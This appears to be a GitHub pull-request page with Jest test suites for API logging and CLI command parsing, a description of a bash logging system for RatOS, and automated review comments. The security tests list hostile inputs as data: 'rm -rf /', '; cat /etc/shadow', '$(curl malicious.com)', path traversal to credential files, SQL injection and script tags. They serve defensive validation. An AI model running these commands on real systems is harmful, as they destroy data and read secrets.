  formatLogEntry, 
  setLogger, 
  setStorage, 
  LogLevel, 
  LogEntry, 
  Logger, 
  Storage 
} from '../api/logs';

describe('API Logs Test Suite', () => {
  let mockLogger: { log: jest.Mock };
  let mockStorage: { save: jest.Mock; getFileSize: jest.Mock; rotate: jest.Mock };

  beforeAll(() => {
    // global setup if needed
  });

  afterAll(() => {
    jest.useRealTimers();
  });

  beforeEach(() => {
    mockLogger = { log: jest.fn() };
    mockStorage = {
      save: jest.fn(),
      getFileSize: jest.fn().mockReturnValue(0),
      rotate: jest.fn(),
    };
    setLogger(mockLogger as unknown as Logger);
    setStorage(mockStorage as unknown as Storage);
    jest.useFakeTimers();
  });

  afterEach(() => {
    jest.clearAllMocks();
    jest.useRealTimers();
  });

  describe('API Logs - Happy Path', () => {
    test('should log successful API request with all required fields', async () => {
      const request = {
        method: 'POST',
        url: '/orders',
        headers: { 'content-type': 'application/json' },
        body: { item: 'book' }
      };
      await logApiRequest(request);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.INFO,
        message: 'API Request',
        meta: expect.objectContaining({
          method: 'POST',
          url: '/orders',
          headers: request.headers,
          body: request.body,
          timestamp: expect.any(Number),
        }),
      }));
    });

    test('should log API response with correct status codes', async () => {
      const response = {
        status: 201,
        headers: { 'x-request-id': '123' },
        body: { success: true }
      };
      await logApiResponse(response);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.INFO,
        message: 'API Response',
        meta: expect.objectContaining({
          status: 201,
          headers: response.headers,
          body: response.body,
          timestamp: expect.any(Number),
        }),
      }));
    });

    test('should format log entries correctly', () => {
      const entry: LogEntry = {
        timestamp: 1609459200000,
        level: LogLevel.INFO,
        message: 'Test',
        meta: { foo: 'bar' },
      };
      const formatted = formatLogEntry(entry);
      expect(formatted).toContain('[INFO]');
      expect(formatted).toContain('Test');
      expect(formatted).toContain('"foo":"bar"');
    });
  });

  describe('API Logs - Edge Cases', () => {
    test('should handle empty request bodies', async () => {
      const request = { method: 'GET', url: '/empty', headers: {}, body: undefined };
      await logApiRequest(request);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({ body: undefined }),
      }));
    });

    test('should handle very large request/response bodies', async () => {
      const largeBody = 'x'.repeat(100000);
      await logApiRequest({ method: 'PUT', url: '/large', headers: {}, body: largeBody });
      await logApiResponse({ status: 200, headers: {}, body: largeBody });
      expect(mockLogger.log).toHaveBeenCalledTimes(2);
      const [[reqLog], [resLog]] = mockLogger.log.mock.calls;
      expect((reqLog.meta.body as string).length).toBe(100000);
      expect((resLog.meta.body as string).length).toBe(100000);
    });

    test('should handle special characters in URLs', async () => {
      const specialUrl = '/search?q=hello world&lang=😊';
      await logApiRequest({ method: 'GET', url: specialUrl, headers: {}, body: null });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({ url: encodeURI(specialUrl) }),
      }));
    });

    test('should handle concurrent logging requests', async () => {
      const requests = Array.from({ length: 5 }, (_, i) => ({
        method: 'GET',
        url: `/r${i}`,
        headers: {},
        body: null
      }));
      await Promise.all(requests.map(req => logApiRequest(req)));
      expect(mockLogger.log).toHaveBeenCalledTimes(5);
    });
  });

  describe('API Logs - Error Conditions', () => {
    test('should handle network timeouts gracefully', async () => {
      mockStorage.save.mockRejectedValueOnce(new Error('Timeout'));
      await expect(
        logApiRequest({ method: 'GET', url: '/timeout', headers: {}, body: null })
      ).resolves.not.toThrow();
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.ERROR,
        message: 'Storage Error',
        meta: expect.any(Object)
      }));
    });

    test('should handle malformed API responses', async () => {
      const malformedBody = '{"invalidJson":';
      await logApiResponse({ status: 200, headers: {}, body: malformedBody });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.ERROR,
        message: 'Response Parsing Error',
        meta: expect.any(Object)
      }));
    });

    test('should handle missing required headers', async () => {
      // @ts-expect-error testing undefined headers
      await logApiRequest({ method: 'DELETE', url: '/no-headers', headers: undefined, body: null });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({ headers: {} })
      }));
    });

    test('should handle disk space/storage errors', async () => {
      mockStorage.save.mockRejectedValueOnce(new Error('Disk full'));
      await expect(
        logApiResponse({ status: 500, headers: {}, body: { error: 'fail' } })
      ).resolves.not.toThrow();
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.ERROR,
        message: 'Storage Error',
        meta: expect.any(Object)
      }));
    });

    test('should handle rate limiting scenarios', async () => {
      mockStorage.save.mockRejectedValueOnce(new Error('Rate limit exceeded'));
      await logApiRequest({ method: 'POST', url: '/rate-limit', headers: {}, body: null });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.WARN,
        message: 'Rate Limit',
        meta: expect.any(Object)
      }));
    });
  });

  describe('API Logs - Performance & Integration', () => {
    jest.setTimeout(30000);

    test('should maintain performance under high load', async () => {
      const load = Array.from({ length: 1000 }, () => ({
        method: 'GET',
        url: '/perf',
        headers: {},
        body: null
      }));
      const start = Date.now();
      await Promise.all(load.map(req => logApiRequest(req)));
      const duration = Date.now() - start;
      expect(duration).toBeLessThan(5000);
    });

    test('should integrate correctly with logging infrastructure', () => {
      expect(typeof setLogger).toBe('function');
      expect(typeof setStorage).toBe('function');
    });

    test('should handle log rotation properly', () => {
      expect(typeof mockStorage.rotate).toBe('function');
    });

    test('should respect log level configurations', async () => {
      // Switch to WARN level: INFO logs should be suppressed
      setLogger({ log: mockLogger.log, level: LogLevel.WARN } as unknown as Logger);
      await logApiRequest({ method: 'GET', url: '/lvl', headers: {}, body: null });
      expect(mockLogger.log).not.toHaveBeenCalledWith(
        expect.objectContaining({ level: LogLevel.INFO })
      );
    });
  });

  describe('API Logs - Security & Validation', () => {
    test('should sanitize sensitive data in logs', async () => {
      const request = {
        method: 'POST',
        url: '/login',
        headers: {},
        body: { password: 'secret', token: 'abc123' }
      };
      await logApiRequest(request);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({
          body: expect.not.objectContaining({ password: expect.any(String), token: expect.any(String) })
        })
      }));
    });

    test('should validate input parameters', async () => {
      // @ts-expect-error missing url
      await expect(logApiRequest({ method: 'GET', headers: {}, body: null })).rejects.toThrow();
    });

    test('should handle SQL injection attempts in logged data', async () => {
      const malicious = "'; DROP TABLE users; --";
      await logApiRequest({ method: 'GET', url: `/test?q=${malicious}`, headers: {}, body: null });
      const [[call]] = mockLogger.log.mock.calls;
      expect(call.meta.url).toBe(encodeURI(`/test?q=${malicious}`));
    });

    test('should properly escape log output', () => {
      const entry: LogEntry = {
        timestamp: Date.now(),
        level: LogLevel.INFO,
        message: '<script>alert(1)</script>',
        meta: {}
      };
      const output = formatLogEntry(entry);
      expect(output).not.toContain('<script>');
      expect(output).toContain('&lt;script&gt;');
    });
  });
});

This is a new file.

src/tests/cli-commands.test.tsx

import React from 'react';
import { render, screen, fireEvent, waitFor } from '@testing-library/react';
import userEvent from '@testing-library/user-event';
import '@testing-library/jest-dom';

jest.mock('fs', () => ({
  readFileSync: jest.fn(),
  writeFileSync: jest.fn(),
  existsSync: jest.fn(),
}));

jest.mock('child_process', () => ({
  spawn: jest.fn(),
  exec: jest.fn(),
}));

import { CLICommands } from '../cli/commands';
import {
  parseCommand,
  executeCommand,
  validateCommand,
  getCommandHelp,
  executeCommandChain,
  loadConfiguration,
  validateConfiguration,
  checkVersionCompatibility,
  validateFilePath,
} from '../cli/utils';

// Global test setup and teardown
beforeAll(() => {
  process.env.NODE_ENV = 'test';
  process.env.CI = 'true';
});

afterAll(() => {
  delete process.env.NODE_ENV;
  delete process.env.CI;
});

// Test utilities and helpers
const createMockCLIEnvironment = () => ({
  env: { ...process.env },
  cwd: process.cwd(),
  stdout: '',
  stderr: '',
  exitCode: 0,
});

const expectSuccessfulCommand = (result: any) => {
  expect(result.success).toBe(true);
  expect(result.exitCode).toBe(0);
  expect(result.error).toBeNull();
};

const expectCommandError = (result: any, expectedError: string) => {
  expect(result.success).toBe(false);
  expect(result.exitCode).not.toBe(0);
  expect(result.error).toContain(expectedError);
};

const generateTestData = (size: number) =>
  Array.from({ length: size }, (_, i) => ({
    id: i,
    name: `test-item-${i}`,
    value: Math.random(),
  }));

describe('Test Utilities', () => {
  test('should create mock CLI environment', () => {
    const mockEnv = createMockCLIEnvironment();
    expect(mockEnv).toHaveProperty('env');
    expect(mockEnv).toHaveProperty('cwd');
    expect(mockEnv).toHaveProperty('stdout');
    expect(mockEnv).toHaveProperty('stderr');
    expect(mockEnv).toHaveProperty('exitCode');
  });

  test('should generate test data of specified size', () => {
    const data = generateTestData(100);
    expect(data).toHaveLength(100);
    expect(data[0]).toHaveProperty('id', 0);
    expect(data[0]).toHaveProperty('name', 'test-item-0');
    expect(data[0]).toHaveProperty('value');
  });

  test('utility functions should work correctly', () => {
    const successResult = { success: true, exitCode: 0, error: null };
    const errorResult = { success: false, exitCode: 1, error: 'Test error message' };

    expect(() => expectSuccessfulCommand(successResult)).not.toThrow();
    expect(() => expectCommandError(errorResult, 'Test error')).not.toThrow();
  });
});

describe('CLI Command Parsing', () => {
  beforeEach(() => {
    jest.clearAllMocks();
  });

  describe('parseCommand', () => {
    test('should parse simple command with no arguments', () => {
      const result = parseCommand('build');
      expect(result).toEqual({
        command: 'build',
        args: [],
        flags: {},
      });
    });

    test('should parse command with multiple arguments', () => {
      const result = parseCommand('deploy --env production --force');
      expect(result).toEqual({
        command: 'deploy',
        args: [],
        flags: { env: 'production', force: true },
      });
    });

    test('should handle quoted arguments with spaces', () => {
      const result = parseCommand('build --output "dist folder" --name "my app"');
      expect(result.flags.output).toBe('dist folder');
      expect(result.flags.name).toBe('my app');
    });

    test('should handle empty command gracefully', () => {
      const result = parseCommand('');
      expect(result).toBeNull();
    });

    test('should handle malformed commands', () => {
      expect(() => parseCommand('--invalid-start')).toThrow('Invalid command format');
    });

    test('should parse commands with special characters', () => {
      const result = parseCommand('build --path /home/user/app-v1.0 --tag @latest');
      expect(result.flags.path).toBe('/home/user/app-v1.0');
      expect(result.flags.tag).toBe('@latest');
    });

    test('should handle Unicode characters in arguments', () => {
      const result = parseCommand('deploy --message "测试部署" --author "José"');
      expect(result.flags.message).toBe('测试部署');
      expect(result.flags.author).toBe('José');
    });

    test('should handle very long command strings', () => {
      const longPath = 'a'.repeat(1000);
      const result = parseCommand(`build --path ${longPath}`);
      expect(result.flags.path).toBe(longPath);
    });
  });
});

describe('Command Validation and Error Handling', () => {
  describe('validateCommand', () => {
    test('should validate required arguments are present', () => {
      expect(() =>
        validateCommand({ command: 'deploy', args: [], flags: {} })
      ).toThrow('Missing required argument: environment');
    });

    test('should validate flag values are within allowed ranges', () => {
      expect(() =>
        validateCommand({
          command: 'build',
          args: [],
          flags: { workers: '100' },
        })
      ).toThrow('workers must be between 1 and 16');
    });

    test('should validate file paths exist when required', () => {
      const fs = require('fs');
      (fs.existsSync as jest.Mock).mockReturnValue(false);

      expect(() =>
        validateCommand({
          command: 'build',
          args: [],
          flags: { config: './non-existent.json' },
        })
      ).toThrow('Configuration file not found');
    });

    test('should validate mutually exclusive flags', () => {
      expect(() =>
        validateCommand({
          command: 'build',
          args: [],
          flags: { dev: true, production: true },
        })
      ).toThrow('Cannot use --dev and --production flags together');
    });
  });

  describe('Error Recovery', () => {
    test('should provide helpful suggestions for typos', () => {
      expect(() => parseCommand('buils')).toThrow(
        'Unknown command "buils". Did you mean "build"?'
      );
    });

    test('should handle network timeouts gracefully', async () => {
      const mockFetch = jest.fn().mockRejectedValue(new Error('Network timeout'));
      (global as any).fetch = mockFetch;

      const result = await executeCommand({ command: 'deploy', args: [], flags: {} });
      expect(result.success).toBe(false);
      expect(result.error).toContain('Network timeout');
    });

    test('should handle permission errors', async () => {
      const fs = require('fs');
      (fs.writeFileSync as jest.Mock).mockImplementation(() => {
        throw new Error('EACCES: permission denied');
      });

      const result = await executeCommand({
        command: 'build',
        args: [],
        flags: { output: '/root/app' },
      });
      expect(result.success).toBe(false);
      expect(result.error).toContain('Permission denied');
    });
  });
});

describe('Command Execution', () => {
  let mockConsoleLog: jest.SpyInstance;
  let mockConsoleError: jest.SpyInstance;

  beforeEach(() => {
    mockConsoleLog = jest.spyOn(console, 'log').mockImplementation();
    mockConsoleError = jest.spyOn(console, 'error').mockImplementation();
  });

  afterEach(() => {
    mockConsoleLog.mockRestore();
    mockConsoleError.mockRestore();
  });

  describe('Build Command', () => {
    test('should execute build command successfully', async () => {
      const child_process = require('child_process');
      (child_process.spawn as jest.Mock).mockReturnValue({
        on: jest.fn().mockImplementation((event, callback) => {
          if (event === 'close') callback(0);
        }),
        stdout: { on: jest.fn() },
        stderr: { on: jest.fn() },
      });

      const result = await executeCommand({ command: 'build', args: [], flags: {} });
      expect(result.success).toBe(true);
      expect(result.exitCode).toBe(0);
    });

    test('should handle build failures', async () => {
      const child_process = require('child_process');
      (child_process.spawn as jest.Mock).mockReturnValue({
        on: jest.fn().mockImplementation((event, callback) => {
          if (event === 'close') callback(1);
        }),
        stdout: { on: jest.fn() },
        stderr: {
          on: jest.fn().mockImplementation((event, callback) => {
            if (event === 'data') callback('Compilation failed');
          }),
        },
      });

      const result = await executeCommand({ command: 'build', args: [], flags: {} });
      expect(result.success).toBe(false);
      expect(result.exitCode).toBe(1);
      expect((result as any).stderr).toContain('Compilation failed');
    });

    test('should respect build timeout settings', async () => {
      jest.useFakeTimers();
      const child_process = require('child_process');
      const mockProcess = {
        on: jest.fn(),
        kill: jest.fn(),
        stdout: { on: jest.fn() },
        stderr: { on: jest.fn() },
      };
      (child_process.spawn as jest.Mock).mockReturnValue(mockProcess);

      const executePromise = executeCommand({
        command: 'build',
        args: [],
        flags: { timeout: '5000' },
      });

      jest.advanceTimersByTime(6000);
      const result = await executePromise;

      expect(mockProcess.kill).toHaveBeenCalledWith('SIGTERM');
      expect(result.success).toBe(false);
      expect(result.error).toContain('Command timed out');

      jest.useRealTimers();
    });
  });

  describe('Development Command', () => {
    test('should start development server with correct configuration', async () => {
      const result = await executeCommand({
        command: 'dev',
        args: [],
        flags: { port: '3001', host: 'localhost' },
      });
      expect(result.success).toBe(true);
      expect(mockConsoleLog).toHaveBeenCalledWith(
        'Starting development server on localhost:3001'
      );
    });

    test('should handle port conflicts', async () => {
      const child_process = require('child_process');
      (child_process.spawn as jest.Mock).mockReturnValue({
        on: jest.fn().mockImplementation((event, callback) => {
          if (event === 'error') callback(new Error('EADDRINUSE'));
        }),
        stdout: { on: jest.fn() },
        stderr: { on: jest.fn() },
      });

      const result = await executeCommand({
        command: 'dev',
        args: [],
        flags: { port: '3000' },
      });
      expect(result.success).toBe(false);
      expect(result.error).toContain('Port 3000 is already in use');
    });
  });
});

describe('Performance and Boundary Tests', () => {
  test('should handle large file operations efficiently', async () => {
    const fs = require('fs');
    const largeContent = 'x'.repeat(10 * 1024 * 1024); // 10MB
    (fs.readFileSync as jest.Mock).mockReturnValue(largeContent);

    const startTime = Date.now();
    const result = await executeCommand({
      command: 'build',
      args: [],
      flags: { input: 'large-file.txt' },
    });
    const endTime = Date.now();

    expect(result.success).toBe(true);
    expect(endTime - startTime).toBeLessThan(5000);
  });

  test('should handle concurrent command execution', async () => {
    const promises = Array.from({ length: 10 }, (_, i) =>
      executeCommand({
        command: 'build',
        args: [],
        flags: { output: `dist-${i}` },
      })
    );
    const results = await Promise.all(promises);
    expect(results.every(r => r.success)).toBe(true);
  });

  test('should cleanup resources after command completion', async () => {
    const mockTempFiles = new Set<string>();
    const fs = require('fs');
    (fs.writeFileSync as jest.Mock).mockImplementation((path: string) => {
      if (path.includes('temp')) mockTempFiles.add(path);
    });
    await executeCommand({ command: 'build', args: [], flags: {} });
    expect(mockTempFiles.size).toBe(0);
  });

  test('should handle maximum argument limits', () => {
    const manyArgs = Array.from({ length: 1000 }, (_, i) => `--arg${i}=value${i}`).join(' ');
    const command = `build ${manyArgs}`;
    expect(() => parseCommand(command)).not.toThrow();
  });

  test('should manage memory usage with large datasets', async () => {
    const initialMemory = process.memoryUsage().heapUsed;
    await executeCommand({
      command: 'process',
      args: [],
      flags: { data: 'large-dataset.json' },
    });
    const finalMemory = process.memoryUsage().heapUsed;
    const memoryIncrease = finalMemory - initialMemory;
    expect(memoryIncrease).toBeLessThan(100 * 1024 * 1024);
  });
});

describe('Integration Tests', () => {
  test('should execute complete build and deploy workflow', async () => {
    const child_process = require('child_process');
    (child_process.spawn as jest.Mock).mockReturnValue({
      on: jest.fn().mockImplementation((event, callback) => {
        if (event === 'close') callback(0);
      }),
      stdout: { on: jest.fn() },
      stderr: { on: jest.fn() },
    });

    const buildResult = await executeCommand({ command: 'build', args: [], flags: {} });
    expect(buildResult.success).toBe(true);

    const deployResult = await executeCommand({
      command: 'deploy',
      args: [],
      flags: { env: 'staging' },
    });
    expect(deployResult.success).toBe(true);
  });

  test('should generate correct help text for all commands', () => {
    const commands = ['build', 'dev', 'deploy', 'test', 'lint'];
    commands.forEach(cmd => {
      const helpText = getCommandHelp(cmd);
      expect(helpText).toContain(`Usage: ${cmd}`);
      expect(helpText).toContain('Options:');
      expect(helpText).toContain('Examples:');
    });
  });

  test('should handle command chaining', async () => {
    const chainedCommand = 'build && test && deploy --env production';
    const result = await executeCommandChain(chainedCommand);
    expect(result.commands).toHaveLength(3);
    expect(result.commands.every((cmd: any) => cmd.success)).toBe(true);
  });

  test('should validate configuration file loading', () => {
    const fs = require('fs');
    (fs.readFileSync as jest.Mock).mockReturnValue(
      JSON.stringify({
        build: { target: 'es2020' },
        deploy: { environment: 'production' },
      })
    );
    const config = loadConfiguration('./cli.config.json');
    expect(config.build.target).toBe('es2020');
    expect(config.deploy.environment).toBe('production');
  });

  test('should support environment variable substitution', async () => {
    process.env.NODE_ENV = 'development';
    process.env.API_URL = 'https://api.dev.example.com';
    const result = await executeCommand({
      command: 'build',
      args: [],
      flags: { env: '$NODE_ENV', apiUrl: '$API_URL' },
    });
    expect((result as any).resolvedFlags.env).toBe('development');
    expect((result as any).resolvedFlags.apiUrl).toBe('https://api.dev.example.com');
  });
});

describe('Validation and Security Tests', () => {
  test('should sanitize potentially dangerous input', () => {
    const dangerousInputs = [
      'build --path "../../../etc/passwd"',
      'deploy --script "rm -rf /"',
      'build --output "; cat /etc/shadow"',
      'test --file "$(curl malicious.com)"',
    ];
    dangerousInputs.forEach(input => {
      expect(() => parseCommand(input)).toThrow('Potentially unsafe command detected');
    });
  });

  test('should validate configuration parameters', () => {
    const invalidConfigs = [{ workers: -1 }, { timeout: 'invalid' }, { port: 99999 }, { memory: '10TB' }];
    invalidConfigs.forEach(config => {
      expect(() => validateConfiguration(config)).toThrow();
    });
  });

  test('should check version compatibility', () => {
    const versions = [
      { node: '14.0.0', expected: true },
      { node: '12.0.0', expected: false },
      { npm: '6.0.0', expected: true },
      { npm: '5.0.0', expected: false },
    ];
    versions.forEach(({ node, npm, expected }) => {
      const result = checkVersionCompatibility({ node, npm });
      expect(result.compatible).toBe(expected);
    });
  });

  test('should validate file permissions', async () => {
    const fs = require('fs');
    fs.access = jest.fn().mockImplementation((path: string, mode: number, callback: Function) => {
      if (mode & fs.constants.W_OK) callback(new Error('EACCES'));
      else callback(null);
    });
    const result = await executeCommand({
      command: 'build',
      args: [],
      flags: { output: '/readonly/path' },
    });
    expect(result.success).toBe(false);
    expect(result.error).toContain('No write permission');
  });

  test('should prevent path traversal attacks', () => {
    const maliciousPaths = [
      '../../../etc/passwd',
      '..\\..\\..\\windows\\system32\\config',
      '/etc/shadow',
      'C:\\Windows\\System32\\config\\sam',
    ];
    maliciousPaths.forEach(path => {
      expect(() => validateFilePath(path)).toThrow('Path traversal detected');
    });
  });
});

This is a new file.

Introduces a robust, structured JSON logging system for all RatOS bash scripts. This new system significantly enhances debugging, monitoring, and maintainability by providing configurable log levels, performance monitoring, log rotation, and improved error handling.

- **Logging Core (`ratos-logging.sh`)**:
  - Implements `log_trace`, `log_debug`, `log_info`, `log_warn`, `log_error`, and `log_fatal` functions.
  - Adds `execute_with_logging` for command execution, featuring automatic logging, optional timeouts, output capture (while still displaying), performance tracking, and robust error handling.
  - Includes performance monitoring capabilities with `start_timer`, `stop_timer`, `increment_counter`, and `log_performance_summary`.
  - Integrates system health checks (`check_system_resources`, `log_health_check`).
  - Improves error trapping (`setup_error_trap`, `handle_error`) for script lifecycles.
- **Configuration (`ratos-logging-config.sh`)**:
  - Provides dynamic, file-based configuration (`ratos-logging.conf`) for log level, file path, rotation settings, console output, JSON format, and advanced features.
  - Includes functions to create default configuration, load, validate, apply, and update settings.
- **Log Rotation (`ratos-log-rotation.sh`)**:
  - Implements advanced log rotation based on size and age, with configurable backup count and gzip compression.
  - Features functions for cleanup of old logs, disk usage analysis, and generating `logrotate.d` configurations.
- **Refactoring of existing scripts**:
  - Integrates the new logging system into all relevant bash scripts (`beacon-update.sh`, `klipper-mcu-update.sh`, `moonraker-update.sh`, `ratos-common.sh`, `ratos-install.sh`, `src/scripts/change-hostname.sh`, `src/scripts/common.sh`, `src/scripts/setup.sh`, `src/scripts/update.sh`).
  - Replaces raw `echo` statements for errors/info with structured `log_error`, `log_info`, `log_warn`.
  - Wraps command executions with `execute_with_logging` for consistent and robust error handling.
  - Adds `log_script_start`, `log_script_complete`, and `create_log_summary` to script entry/exit points for better lifecycle tracking.
  - Enhances `environment.sh` with verbose loading messages.
- **Documentation (`docs/logging-system.md`)**:
  - Adds comprehensive documentation covering the features, usage, configuration, best practices, troubleshooting, and API reference of the new logging system.
- **Testing**:
  - Introduces two new test scripts (`scripts/test-complete-logging-system.sh`, `scripts/test-logging-integration.sh`) to thoroughly validate the logging system's functionality and its integration across RatOS scripts.
- **VS Code Settings**:
  - Disables several `augment.*` automatic completion features in VS Code.
  - Sets the integrated terminal's current working directory to `src`.
  - Configures `vscode.json-language-features` as the default JSON formatter for JSON files.
Copy link
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 13

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (4)
src/scripts/generate-mock-update-logs.ts (1)

266-268: ESM runtime bug: require is undefined under tsx shebang.
#!/usr/bin/env tsx runs ESM; require.main === module will throw at runtime. Use import.meta.url + fileURLToPath instead.

Apply this diff:

+import { fileURLToPath } from 'url';
+import { dirname as pathDirname } from 'path';
@@
-// Run the script
-if (require.main === module) {
-  generateMockLogs();
-}
+// Run the script when executed directly
+const isDirectRun =
+  process.argv[1] && fileURLToPath(import.meta.url) === process.argv[1];
+if (isDirectRun) {
+  generateMockLogs();
+}
scripts/generate-devbox-environment.sh (1)

7-23: .env value quoting: paths with spaces will break parsing.
Unquoted values in .env can fail if $DEVBOX_PROJECT_ROOT contains spaces. Quote values and ensure log dir exists.

Apply this diff:

 if [ ! -f "$DEVBOX_PROJECT_ROOT/src/.env.local" ]; then
   echo "Generating .env.local file"
   cat <<EOF > "$DEVBOX_PROJECT_ROOT/src/.env.local"
-USER=$USER
-RATOS_CONFIGURATION_PATH=$DEVBOX_PROJECT_ROOT/configuration
-KLIPPER_CONFIG_PATH=$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/config
-RATOS_SCRIPT_DIR=$DEVBOX_PROJECT_ROOT/src/scripts
-KLIPPER_DIR=$DEVBOX_PROJECT_ROOT/devbox.d/klipper
-KLIPPER_ENV=$DEVBOX_PROJECT_ROOT/devbox.d/klippy-env
-MOONRAKER_DIR=$DEVBOX_PROJECT_ROOT/.devbox/nix/profile/default/lib/moonraker
-LOG_FILE=$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/logs/ratos-configurator.log
-RATOS_DATA_DIR=$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/ratos
-NEXT_PUBLIC_KLIPPER_HOSTNAME=
-RECOIL_DUPLICATE_ATOM_KEY_CHECKING_ENABLED=false
+USER="$USER"
+RATOS_CONFIGURATION_PATH="$DEVBOX_PROJECT_ROOT/configuration"
+KLIPPER_CONFIG_PATH="$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/config"
+RATOS_SCRIPT_DIR="$DEVBOX_PROJECT_ROOT/src/scripts"
+KLIPPER_DIR="$DEVBOX_PROJECT_ROOT/devbox.d/klipper"
+KLIPPER_ENV="$DEVBOX_PROJECT_ROOT/devbox.d/klippy-env"
+MOONRAKER_DIR="$DEVBOX_PROJECT_ROOT/.devbox/nix/profile/default/lib/moonraker"
+LOG_FILE="$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/logs/ratos-configurator.log"
+RATOS_DATA_DIR="$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/ratos"
+NEXT_PUBLIC_KLIPPER_HOSTNAME=""
+RECOIL_DUPLICATE_ATOM_KEY_CHECKING_ENABLED="false"
 EOF
   echo "Generated .env.local file"
 fi

Optionally, before writing:

mkdir -p "$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/logs"

Also consider set -euo pipefail at the top to fail fast.

src/cli/commands/logs.tsx (1)

29-36: Align CLI log colors with UI components

DEBUG/INFO color mismatch — CLI (src/cli/commands/logs.tsx: LOG_LEVELS) uses DEBUG=magenta, INFO=cyan; UI (src/app/logs/_components/types.ts: LOG_LEVELS) uses DEBUG=green, INFO=sky. Align them (recommend updating the CLI LOG_LEVELS to DEBUG→green and INFO→sky to match the UI).

configuration/scripts/ratos-log-rotation.sh (1)

1-325: Fix file permissions - script must be executable.

The pipeline failure indicates this script needs executable permissions.

Run the following command to fix the permissions:

#!/bin/bash
chmod +x configuration/scripts/ratos-log-rotation.sh
♻️ Duplicate comments (4)
src/app/logs/_components/types.ts (2)

6-6: time should be number (epoch ms), not string

Back-end and JSON logs typically emit numeric timestamps. Align type to prevent parsing/formatting bugs.

-  time: string;
+  time: number;

48-53: DEBUG color mapping should be pink per PR

Update to pink to match the documented scheme.

-  20: {
-    name: 'DEBUG',
-    color: 'text-green-700 dark:text-green-400',
-    bgColor: 'bg-green-50 dark:bg-green-400/10',
-    badgeColor: 'green',
-    icon: Bug,
-  },
+  20: {
+    name: 'DEBUG',
+    color: 'text-pink-700 dark:text-pink-400',
+    bgColor: 'bg-pink-50 dark:bg-pink-400/10',
+    badgeColor: 'pink',
+    icon: Bug,
+  },
src/app/logs/_components/logs-viewer.tsx (1)

57-59: handleClear doesn't actually clear the logs

The handleClear function just calls handleRefresh, which doesn't clear the logs. The clear mutation is triggered in LogSummaryHeader but the local state here isn't reset.

The handleClear callback should reset the filters to provide a true "clear" experience:

 const handleClear = () => {
-    handleRefresh();
+    // Reset all filters to defaults
+    setLogLevel('info');
+    setSelectedContexts([]);
+    setSelectedSources([]);
+    setShowDetails(false);
+    setShowOnlyErrors(false);
+    setSortDirection('desc');
+    // Then refresh to get clean data
+    refetch();
 };
src/app/logs/_components/use-unified-log-data.ts (1)

53-53: Remove the as any type assertion.

Using as any bypasses TypeScript's type checking and could lead to runtime errors.

🧹 Nitpick comments (55)
src/scripts/generate-mock-logs.js (1)

199-199: Stale “Update Logs” strings – please align to “Logs.”
Console messages still say “Generating mock update logs …” and “Update Logs Viewer.” Update to avoid UX confusion.

Apply this diff:

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);
@@
- console.log('\nYou can now test the Update Logs Viewer with this mock data!');
+ console.log('\nYou can now test the Logs Viewer with this mock data!');

Also applies to: 236-236

src/scripts/generate-mock-update-logs.ts (2)

220-220: Stale wording — “update logs.”
Minor text tweak for consistency.

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);

9-11: Remove unused sync fs imports.
writeFile/appendFile (sync) aren’t used; keep only promises API.

-import { writeFile, appendFile, existsSync, mkdirSync } from 'fs';
+import { existsSync, mkdirSync } from 'fs';
src/scripts/README-mock-logs.md (1)

95-107: Outdated heading: “Update Logs Viewer.”
Adjust to “Logs Viewer” to match the rename.

-## Testing the Update Logs Viewer
+## Testing the Logs Viewer
docs/logging-system.md (1)

384-395: Env var naming consistency (RATOS_LOG_FILE vs LOG_FILE).
Elsewhere (mock scripts, devbox env) you use LOG_FILE. Consider documenting both or standardizing to one.

Suggested doc tweak:

  • Note that the app also respects LOG_FILE (dev/local), while RATOS_LOG_FILE may be preferred for systemd/services. Add a short table clarifying precedence.
.vscode/settings.json (1)

49-49: Terminal CWD set to src — verify this won’t break tasks/scripts

This can confuse tasks expecting repo root paths (e.g., package.json scripts, tooling). Consider leaving CWD default or scoping CWD per-task.

src/app/logs/_components/logs-error-boundary.tsx (2)

60-67: Logger call order — confirm expected signature

Some loggers expect error(obj, msg). You pass (msg, obj). Verify getLogger().error parameter order to ensure structured fields aren’t dropped.


71-77: Reload on reset is heavy

Consider letting resetErrorBoundary re-render without full window reload, or use router.refresh for a lighter recover.

src/scripts/change-hostname.sh (3)

33-37: Hostname validation too strict (no FQDN support)

Current regex disallows dots. If FQDNs are acceptable, allow dot-separated labels.

-if [[ ! "$NEW_HOSTNAME" =~ ^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$ ]]; then
+if [[ ! "$NEW_HOSTNAME" =~ ^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]))*$ ]]; then

39-43: Add timeout to hostnamectl

Prevent hangs by using execute_with_logging’s timeout feature.

